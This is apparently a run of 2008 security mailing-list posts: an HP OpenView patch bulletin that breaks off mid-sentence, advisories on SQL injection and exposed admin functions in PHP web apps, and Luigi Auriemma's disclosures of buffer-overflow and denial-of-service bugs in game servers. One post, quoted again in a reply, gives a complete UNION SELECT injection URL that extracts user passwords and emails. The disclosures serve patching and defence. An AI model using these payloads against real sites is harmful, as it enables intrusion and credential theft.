[security bulletin] HPSBMA02338 SSRT080024, SSRT080041 rev.2 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01466051 Version: 2 HPSBMA02338 SSRT080024, SSRT080041 rev.2 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-06-09 Last Updated: 2008-06-30 Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely execute arbitrary code or to create a Denial of Service (DoS). References: CVE-2008-1842 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Solaris, Linux, and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-1842 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. The Hewlett-Packard Company thanks Liu Zhen Hua of FortiGuard Global Security Research Team for reporting this vulnerability to [EMAIL PROTECTED] RESOLUTION HP has made archive files and patches available to resolve the vulnerability. The archive files are listed in the table below. In some cases a patch is required. The patch will insure that NNM is compatible with the software files in the archive. No patch is required for NNM v7.53 Note: The files installed for the Resolution in "rev.1" of this Security bulletin must be removed. Instructions for removing the files are in the Readme.txt file. The files recommended in "rev.1" of this Security Bulletin introduced a problem with the 'ovstop -c' command. Under certain circumstances the 'ovstop -c' command would not stop certain NNM processes. The files recommended in "rev.1" of this Security Bulletin do resolve the security vulnerability. The patches are available from http://itrc.hp.com The archive files are available from: ftp://ss080024:[EMAIL PROTECTED]/ Unpack the archive and follow the instructions in the Readme.txt file. OV NNM v7.53 Operating System - HP-UX (IA) Required Patch - No patch to base NNM v7.53 is required Archive File - SSRT080024-2_NNM7.53.tar Archive File MD5 Sum - 50ea3050712e789027cebbe0fefd81e7 Operating System - HP-UX (PA) Required Patch - No patch to base NNM v7.53 is required Archive File - SSRT080024-2_NNM7.53.tar Archive File MD5 Sum - 50ea3050712e789027cebbe0fefd81e7 Operating System - Solaris Required Patch - No patch to base NNM v7.53 is required Archive File - SSRT080024-2_NNM7.53.tar Archive File MD5 Sum - 50ea3050712e789027cebbe0fefd81e7 Operating System - Windows Required Patch - No patch to base NNM v7.53 is required Archive File - SSRT080024-2_NNM7.53.tar Archive File MD5 Sum - 50ea3050712e789027cebbe0fefd81e7 Operating System - Linux RedHatAS2.1 Required Patch - No patch to base NNM v7.53 is required Archive File - SSRT080024-2_NNM7.53.tar Archive File MD5 Sum - 50ea3050712e789027cebbe0fefd81e7 OV NNM v7.51 Operating System - HP-UX (IA) Required Patch - PHSS_37274 or subsequent Archive File - SSRT080024-2_NNM7.51.tar Archive File MD5 Sum - dcbe80d2769e2920decaf7eaf901fd8e Operating System - HP-UX (PA) Required Patch - PHSS_37273 or subsequent Archive File - SSRT080024-2_NNM7.51.tar Archive File MD5 Sum - dcbe80d2769e2920decaf7eaf901fd8e Operating System - Solaris Required Patch - PSOV_03490 or subsequent Archive File - SSRT080024-2_NNM7.51.tar Archive File MD5 Sum - dcbe80d2769e2920decaf7eaf901fd8e Operating System - Windows Required Patch - NNM_01168 or subsequent Archive File - SSRT080024-2_NNM7.51.tar Archive File MD5 Sum - dcbe80d2769e2920decaf7eaf901fd8e Operating System - Linux RedHatAS2.1 Required Patch - LXOV_00060 or subsequent Archive File - SSRT080024-2_NNM7.51.tar Archive File MD5 Sum - dcbe80d2769e2920decaf7eaf901fd8e OV NNM v7.01 Operating System - HP-UX (PA) Required Patch - PHSS_36773 or subsequent Archive File - SSRT080024-2_NNM7.01.tar Archive File MD5 Sum - 5165a25b88a9229b1cdc8f3b57a20ecd Operating System - Solaris Required Patch - PSOV_03480 or subsequent Archive File - SSRT080024-2_NNM7.01.tar Archive File MD5 Sum - 5165a25b88a9229b1cdc8f3b57a20ecd Operating System - Windows Required Patch - NNM_01159 or subsequent Archive File - SSRT080024-2_NNM7.01.tar Archive File MD5 Sum - 5165a25b88a9229b1cdc8f3b57a20ecd MANUAL ACTIONS: Yes - NonUpdate Apply the appropriate archive as described in the Resolution. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replac
RSS-aggregator Multiple vulnerabilities
*RSS-aggregator* Informations : ** Langage : PHP Version : 1.0 Website : http://www.rss-aggregator.com Problems : Multiple vulnerabilities Description: RSS-aggregator is a tool, for Webmaster, allowing to display several feeds RSS on a single page. Details : * - **SQL injection** - Multiple sql injections: http://localhost/admin/fonctions/supprimer_flux.php?IdFlux=[SQL injection] http://localhost/admin/fonctions/supprimer_tag.php?IdTag=[SQL injection] -- ** Access to admin functions** -- We can easily access to all admin functions directly from files in /admin/fonctions/ directory. Examples: http://localhost/admin/fonctions/supprimer_flux.php?IdFlux=5 http://localhost/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500 Credits: Autor : Sylvain THUAL E-mail : [EMAIL PROTECTED] Website : http://www.click-internet.fr
Re: Remote SQL Injection
Discovered back in May. http://packetstormsecurity.org/0805-exploits/airvaecommerce-sql.txt 8c7afd46a5774569aea14a39556d6bbd AirvaeCommerce version 3.0 suffers from a SQL injection vulnerability. Homepage: http://www.root-qtr.com/"; target="ext">http://www.root-qtr.com/. Authored By mailto:qataro[at]hotmail.com";>QTRinux On Sat, Jun 28, 2008 at 05:33:49PM -, [EMAIL PROTECTED] wrote: > Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de > Application :: AirvaeCommerce 3.0 > Download :: http://www.airvaecommerce.com > Dork 1 :: powered by AirvaeCommerce 3.0 > [C o n t e x > t]- > > Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL] > Example : > /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 > > ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/* > > Note : Some site used SELECT statements have a different number of columns > about 45 . > > ---[End of > context]
Security and Hacking Papers - Updated!
Hi, I have updated my repository of sorted papers about security/Exploitation/Hacking. Now with more than 1 GB of stuff. Enjoy! http://www.orkspace.net/secdocs/ Bye, ORK
Multiple vulnerabilities in S.T.A.L.K.E.R. 1.0006
### Luigi Auriemma Application: S.T.A.L.K.E.R.: Shadow of Chernobyl http://www.stalker-game.com Versions: <= 1.0006 Platforms:Windows Bugs: A] IPureServer::_Recieve buffer-overflow B] NET_Compressor::Decompress integer overflow C] MultipacketReciever::RecievePacket INT3 Exploitation: remote, versus server (probably clients too) Date: 28 Jun 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === S.T.A.L.K.E.R. is a FPS game developed by GSC Game World (http://www.gsc-game.com) and released at the beginning of the 2007 (the Clear Sky sequel is planned for the next months). ### === 2) Bugs === A] IPureServer::_Recieve buffer-overflow MultipacketReciever::RecievePacket is a function used in the game when a packet beginning with the byte 0x39 is received. The main actions performed by this function are: - checking if a specific value in the packet is equal to 0xe0 or 0xe1 - calling NET_Compressor::Decompress for checking the availability of compressed data and decompress it through the lzo1x algorithm and a specific dictionary (mp\lzo-dict.bin) - calling _Recieve for handling the content of this data The _Recieve function gets the 16 bit number specified in the incoming packet and uses memcpy with a 8 kilobytes stack buffer as destination, the data from the packet as source and that 16 bit value as amount of bytes to copy. Each UDP packet in S.T.A.L.K.E.R. has a maximum size of 1472 bytes but through the LZO compression implemented in the game is possible to place up to 32 kilobytes of data in the packet resulting in a stack based buffer-overflow fully controllable by the attacker. -- B] NET_Compressor::Decompress integer overflow -- This function checks if a specific byte in the packet is equal to 0xc1 in which case is performed a CRC check and the decompression of the data using the rtc9_decompress function (lzo1x_decompress_dict_safe). If the data is not compressed the function gets the current size of the data in the packet and performs a memcpy(dst, data, data_size - 1), so the sending of a packet without data causes a crash of the server due to the copying of 0x (0 - 1) bytes. -- C] MultipacketReciever::RecievePacket INT3 -- One of the first operations made by this interesting function is checking if a certain byte in the packet is equal to 0xe0 or 0xe1 otherwise an INT3 instruction is executed leading to the immediate termination of the server: 01906F33 8A45 00 MOV AL,BYTE PTR SS:[EBP] 01906F36 3C E1CMP AL,0E1 01906F38 56 PUSH ESI 01906F39 57 PUSH EDI 01906F3A 894C24 18MOV DWORD PTR SS:[ESP+18],ECX 01906F3E 74 05JE SHORT xrNetSer.01906F45 ; jump if 0xe1 01906F40 3C E0CMP AL,0E0 01906F42 74 01JE SHORT xrNetSer.01906F45 ; jump if 0xe0 01906F44 CC INT3; boom The attacker needs to join the server for exploiting the above vulnerabilities, but although it supports the banning of the IP addresses is possible to spoof the packets and bypassing this limitation due to the lack of handshakes in the protocol of the game. ### === 3) The Code === http://aluigi.org/poc/stalker39x.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
Endless loop in Halo 1.07
### Luigi Auriemma Application: Halo: Combat Evolved http://www.microsoft.com/games/pc/halo.aspx Versions: <= 1.07 Platforms:Windows Bug: endless loop Exploitation: remote, versus server Date: 29 Jun 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Halo is the great FPS game developed by Bungie Studios and ported on PC by Gearbox Software (http://www.gearboxsoftware.com). Although it has been released at the end of 2003, it's still one of the most played games with hundreds of internet servers. ### == 2) Bug == This vulnerability is exactly like the old one I found over 3 years ago in version 1.06 (haloloop) and which was fixed (or it's the case of saying partially fixed) in version 1.07: an endless loop caused by a malformed in-game packet which freezes completely the server. ### === 3) The Code === http://aluigi.org/poc/haloloop2.zip ### == 4) Fix == No fix. ### --- Luigi Auriemma http://aluigi.org
Re: Double Denial of Service in Call of Duty 4 1.6
Version 1.7 of CoD4, released yesterday, is vulnerable too. --- Luigi Auriemma http://aluigi.org
Remote SQL Injection
Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de Application :: AirvaeCommerce 3.0 Download :: http://www.airvaecommerce.com Dork 1 :: powered by AirvaeCommerce 3.0 [C o n t e x t]- Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL] Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/* Note : Some site used SELECT statements have a different number of columns about 45 . ---[End of context]